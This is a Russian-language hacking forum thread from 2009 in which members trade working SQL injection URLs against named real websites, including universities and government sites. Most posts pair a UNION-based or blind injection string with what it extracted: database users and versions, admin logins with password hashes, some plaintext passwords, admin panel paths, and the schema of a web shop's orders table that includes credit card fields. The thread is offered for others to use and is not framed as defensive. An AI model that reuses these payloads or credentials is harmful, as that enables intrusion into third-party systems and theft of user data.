SQL Инъекции

Kraneg · 19 Feb 2009

goxgo.ca - PR6
Code:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Админка:
Code:
http://www.goxgo.ca/admin/
Логин и пароль не знаем, поправим ситуацию:
Code:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+FROM+user--
Вот уже есть логин и пасс:
krista_mckenna:4c1ccfb29d89aaa4746cf7dfb40a28ce
================================================================================
findmespot.ca - PR4
Code:
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())/*
DB_User:webuser@localhost
DB:Web_SPOT_GCAN
DB_Ver:4.0.20-standard
Достаем пользователя из mysql.user
Code:
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user,password)+from+mysql.user/*
root:67c4db4730111611
и так далее =)

Извиняйте за боян maineservicecommission.gov... надо было быть повнимательнее и перепроверить =\

R3b · 19 Feb 2009

Code:

http://www.ldk.gr/expertise.php?id=1++union+select+null,null,null,concat_ws(0x20,user(),database(),version()),null/*

ldk_gr@localhost ldk_gr 5.0.22-log

yarbabin · 19 Feb 2009

Code:

http://stefanboulter.com/single.php?id=-82+union+select+1,2,3,version(),5,6,7,8,9--

5.0.67-log

Assembler · 19 Feb 2009

Code:
http://www.argued.ru
PR: 4
Тиц: 10
Версия: 5.0.67-log
База данных: u29980
Юзверь: [email protected]
Code:
http://www.argued.ru/news.php?id=-1%20union%20select%201,2,concat_ws(0x3a,LOGIN,PASSWORD),4,5,6,7,8,9,10,11,12%20from%20b_user%20--
Админка: http://argued.ru/admin/
Логин: andreygu
Пароль: e0067c761726972b3f473cdef6313fd9

Ох как клево через мою прогу все делать =)

Rubaka · 19 Feb 2009

http://www.phoenixnorthern.co.uk/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

phoenix@localhost

4.1.22

M.W.N.N. · 20 Feb 2009

http://post.gov.bn/news_arc.php?newsid=10+union+select+1,version(),3,4+limit+1,1/*

Version: 5.0.24a-standard-log
User: [email protected]
Database: test

http://www.bridgeportct.gov/_admin/news_detail.php?newsID=258+union+select+1,2,version(),4,5+limit+1,1/*

Version: 5.0.41-community-nt-log
User:admin@localhost
Database: bridgeport

-m0rgan- · 20 Feb 2009

ПР:4
Code:
http://www.wilsonelectronics.com/ViewProduct.php?ID=-123+union+select+1,2,3,4,concat(username,0x3a,userpwd),6,7,8,9,10,11,12,13,14,15,16,17,18+from+siteusers+--+
логин/пасс:
Code:
wilson:c23bde412afe8fd7cf234c9b4cb208a2 
---------------------------------------------------------------------
The End!

попугай · 20 Feb 2009

http://trovator.combios.es/temas/index.php?np=1&c=-188+union+seLECT+1,concat_ws(0x3a,ID,LOGIN,NAME,PASSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+PLD_USER--
Click to expand...

логин - jsenyas: пароль - relevator: мыло - [email protected]

путь к админке по понятным причинам выкладывать не буду...кому надо - найдут и так

R1dex · 20 Feb 2009

Канал "Кинопоказ".
Code:
http://www.kinopokaz.tv/index.php?a=166+and+ascii(substring((select+1+from+site_userlist+limit+1),1,1))%3E1--
kinopokazeditor:4133e372138889e4ef3cb1ac01cb85ed

Gorev · 20 Feb 2009

http://www.andonet.ro/Philips_Magic3VoicePPF571_1908+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),database(),user()),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+LIMIT+1,1.htm

Version : 5.0.51a-log
Database : andonet_ro_librarie
User : [email protected]

sabe · 20 Feb 2009

georgiasouthern.edu

http://news.georgiasouthern.edu/press-release.php?nid=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Click to expand...

Gorev · 20 Feb 2009

http://www.angelosoft.ro/laptop-fujitsu-siemens-esprimo-mobile-v6535-core-duo-t3200-200ghz-15434-2gb-160gb-dvd-p-4725+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user())--%20.html?osCsid=ffde33f340450de06bae3b47a148caf2

Database Version: 5.0.67-community
Database name: angeloso_osc2@localhost
User name: angeloso_osc2

tables
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, address_book, address_format, banners, banners_history, cache, categories, categories_description, configuration, configuration_group, counter, counter_history, countries, currencies, customers, customers_basket, customers_basket_attributes, customers_info, customers_searches, customers_to_extra_fields, cuvant_cheie, extra_fields, extra_fields_info, geo_zones, languages, manufacturers, manufacturers_info, newsletters, orders, orders_products, orders_products_attributes, orders_products_download, orders_status, orders_status_history, orders_total, products, products_attributes, products_attributes_download, products_description, products_extra_fields, products_notifications, products_options, products_options_values, products_options_values_to_products_options, products_to_categories, products_to_products_extra_fields, reviews, reviews_description, sessions, specials, specials1, tax_class, tax_rates, tmp_tax_rates, whos_online, zones, zones_to_geo_zones

column orders
customers_city, customers_postcode, customers_state, customers_country, customers_telephone, customers_email_address, customers_address_format_id, delivery_name, delivery_company, delivery_street_address, delivery_suburb, delivery_city, delivery_postcode, delivery_state, delivery_country, delivery_address_format_id, billing_name, billing_company, billing_street_address, billing_suburb, billing_city, billing_postcode, billing_state, billing_country, billing_address_format_id, payment_method, cc_type, cc_owner, cc_number, cc_expires, last_modified, date_purchased, orders_status, orders_date_finished, currency, currency_value

pinky07 · 20 Feb 2009

www.playground.ru
Для любителей острых ощущений=)))

http://www.playground.ru/games/-gta_4'+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
Click to expand...

p.s. вывод в адресной строке

Gorev · 20 Feb 2009

http://www.brainzcomputers.ro/index.php?page=detalii_video&chipset=ATI&id_produs=-38+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

Database Version: 4.1.11-Debian_4sarge8-log
Database name: ccd_brainz
User name: ccd_brainz@localhost

f1ng3r · 20 Feb 2009

Code:
http://www.viewtrak.com/about/article.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14--
Database Version : 4.1.22-community-n
Database name : viewtrak
User name : [email protected]

админ :
Code:
http://www.viewtrak.com/about/article.php?id=-1+union+select+1,2,3,4,concat_ ws(0x3a,user_ name,password),6,7,8,9,10,11,12,13,14+from+users--
Code:
admin:admin4viewtrak
админка без авторизации:
Code:
 http://www.viewtrak.com/admin/en/ index.php
так же в ней можно добавлять файлы

------------------------------------------------------------#
Code:
http://www.cite.hku.hk/news.php?category=seminar&id=-1+union+select+1,concat_ws(0x3a,version(),database(), u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 5.0.37-log
Database name : cite
User name : citedbo@localhost

админы:
Code:
http://www.cite.hku.hk/news.php?category=seminar&id=-1+union+select+1,concat _ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+account--
Code:
Candy:$1$4iOeog5p$te/NM9ZmknZbtV.uSHFcr1
Bella:$1$rJdba229$9YqG3IApT4Ox9XHwdsgxL/

Parserian · 20 Feb 2009

Code:
http://spotters.net.ua/file/?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,(concat_ws(CHAR(58),CHAR(58),CHAR(58),CHAR(58),user(),database(),version())),19,20,21,22,23
вывод в строке заголовка
user - spotters_spot@apollo
db - spotters_spot
version - 4.1.22-log

z00MAN · 20 Feb 2009

одна скуля, но интересная

Недвижимость в Испании :: Costa Real
Code:
http://www.costa-real.ru/articlesInfo.php?id=20+union+select+concat(version(),0x3a,user(),0x3a,database()),222,333,444,555,666--
вывод - смотрим исходный код

user(): [email protected]
database(): costareal
version(): 5.0.32-Debian_7etch6-log

PR=4
тИЦ=40

т к 5-ая ветка читаем таблицы
Code:
http://www.costa-real.ru/articlesInfo.php?id=20+union+select+table_name,222,333,444,555,666+from+information_schema.tables--
дальше сами.

pinky07 · 20 Feb 2009

www.drumspeech.com известный сайт барабанщиков=)

таблица с юзерами:

http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name+like+char(37,108,111,103,105,110,37)+limit+2,1),1,1))=117 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name+like+char(37,108,111,103,105,110,37)+limit+2,1),2,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name+like+char(37,108,111,103,105,110,37)+limit+2,1),3,1))=101 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name+like+char(37,108,111,103,105,110,37)+limit+2,1),4,1))=114 r
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name+like+char(37,108,111,103,105,110,37)+limit+2,1),5,1))=0
Click to expand...

колонка с паролями:

http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),1,1))=112 p
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),2,1))=97 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),3,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),4,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),5,1))=119 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),6,1))=100 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+2,1),7,1))=0
Click to expand...

колонка с логинами:

http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+1,1),1,1))=108 l
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+1,1),2,1))=111 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+1,1),3,1))=103 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+1,1),4,1))=105 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+1,1),5,1))=110 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name=0x75736572+limit+1,1),6,1))=0
Click to expand...

админ:

http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),1,1))=119 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),2,1))=101 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),3,1))=98 b
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),4,1))=100 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),5,1))=111 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),6,1))=103 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+login+FROM+user+limit+0,1),7,1))=0
Click to expand...

его пароль:

http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),1,1))=122 z
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),2,1))=97 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),3,1))=110 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),4,1))=117 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),5,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),6,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),7,1))=105 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+passwd+FROM+user+limit+0,1),8,1))=0
Click to expand...

drumnet.ru Ещё один известный сайт барабанщиков)

http://drumnet.ru/viewevent.php?id_pub=-99999+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6+--+
Click to expand...

юзер - [email protected]
бд - z49030_drumnet
версия MySQL - 5.0.51a-12-log

edichka · 21 Feb 2009

carc.jo pr 6

HTML:

http://www.carc.jo/pages_en.php?type=page&id=-1+union+select+concat_ws(0x3a3a,version(),database(),user())

5.0.67-community-log::carcgov_marka::carcgov_marka@localhost

http://carc.jo/admin/ - админка basic

shonenjump.com pr 5

HTML:

http://www.shonenjump.com/news/contest/winners/index.php?id=-5+union+select+concat_ws(0x3a3a,version(),database(),user()),2,3,4,5

5.0.45-Debian_1ubuntu3.4-log::sj_cms::shonenjump@vpersuadertron

R1dex · 21 Feb 2009

Сеть информационно-платежных киосков "Мгновенно"
Code:
http://www.mgnoveno.ru/index.php?p=news&act=more&news_id=102+and+ascii(substring((select+1+from+user+limit+1),1,1))%3E1--

SQL Инъекции

Kraneg Elder - Старейшина

R3b New Member

yarbabin HACKIN YO KUT

Assembler Elder - Старейшина

Rubaka Elder - Старейшина

M.W.N.N. Member

-m0rgan- Elder - Старейшина

попугай Elder - Старейшина

R1dex Elder - Старейшина

Gorev Level 8

sabe Elder - Старейшина

Gorev Level 8

pinky07 Member

Gorev Level 8

f1ng3r [забытый полк]

Parserian New Member

z00MAN Banned

pinky07 Member

edichka Member

R1dex Elder - Старейшина

Useful Searches

SQL Инъекции

Kraneg Elder - Старейшина

R3b New Member

yarbabin HACKIN YO KUT

Assembler Elder - Старейшина

Rubaka Elder - Старейшина

M.W.N.N. Member

-m0rgan- Elder - Старейшина

попугай Elder - Старейшина

R1dex Elder - Старейшина

Gorev Level 8

sabe Elder - Старейшина

Gorev Level 8

pinky07 Member

Gorev Level 8

f1ng3r [забытый полк]

Parserian New Member

z00MAN Banned

pinky07 Member

edichka Member

R1dex Elder - Старейшина